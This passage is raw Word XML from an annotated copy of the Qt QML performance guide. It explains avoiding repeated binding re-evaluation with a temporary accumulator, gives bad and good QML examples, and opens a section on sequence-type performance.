      <w:bookmarkEnd w:id="891"/>
      <w:bookmarkEnd w:id="892"/>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B64750">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A property binding expression will be re-evaluated if any of the properties it references are changed</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. As such, binding expressions </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64750">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be kept as simple as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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B64750">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you have a loop where you do some processing, but only the final result of the processing is important, it is often better to update a temporary accumulator which you afterwards assign to the property you need to update, rather than incrementally updating the property itself, in order to avoid triggering re-evaluation of binding expressions during the intermediate stages of accumulation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E458AC" w:rsidRPr="00E458AC" w:rsidRDefault="00E458AC" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>апошнія два прыклады паказваюць, калі добра ствараць часовыя пераменныя</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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The following contrived </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64750">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> illustrates this point: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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bad.qml</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QtQuick</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2.3</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Item</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root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property</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> accumulatedValue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Text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anchors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fill</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parent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text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root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accumulatedValue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toString</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onTextChanged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"text binding re-evaluated"</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Component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onCompleted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someData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3</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4</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5</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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someData</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length</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i</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accumulatedValue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accumulatedValue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someData</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i</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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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The loop in the onCompleted handler causes the "text" property binding to be re-evaluated six times (which then results in any other property bindings which rely on the text value, as well as the onTextChanged signal handler, to be re-evaluated each time, and lays out the text for display each time). This is clearly unnecessary in this case, since we really only care about the final value of the accumulation.</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lastRenderedPageBreak/>
        <w:t>It could be rewritten as follows:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// good.qml</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QtQuick</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2.3</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Item</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root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property</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> accumulatedValue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Text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anchors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fill</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parent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text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root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accumulatedValue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toString</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onTextChanged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"text binding re-evaluated"</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Component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onCompleted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someData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3</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4</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5</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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> temp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accumulatedValue</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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someData</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length</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i</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temp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temp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someData</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i</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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00E458AC" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        accumulatedValue </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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E458AC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="893" w:name="sequence-tips"/>
      <w:bookmarkStart w:id="894" w:name="_Toc483000719"/>
      <w:bookmarkStart w:id="895" w:name="_Toc483003736"/>
      <w:bookmarkStart w:id="896" w:name="_Toc483604071"/>
      <w:bookmarkStart w:id="897" w:name="_Toc483605291"/>
      <w:bookmarkEnd w:id="893"/>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sequence tips</w:t>
      </w:r>
      <w:bookmarkEnd w:id="894"/>
      <w:bookmarkEnd w:id="895"/>
      <w:bookmarkEnd w:id="896"/>
      <w:bookmarkEnd w:id="897"/>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As mentioned earlier, </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some sequence types are fast</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId623" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;int&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId624" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qreal&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId625" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;bool&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId626" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId627" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QString</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId628" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId629" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId630" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QUrl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;) while </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>others will be much slower</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aside from using these types wherever possible instead of slower types, there are some other performance-related semantics you need to be aware of to achieve the best performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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Firstly, there are </w:t>
      </w:r>
      <w:r w:rsidRPr="000768F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
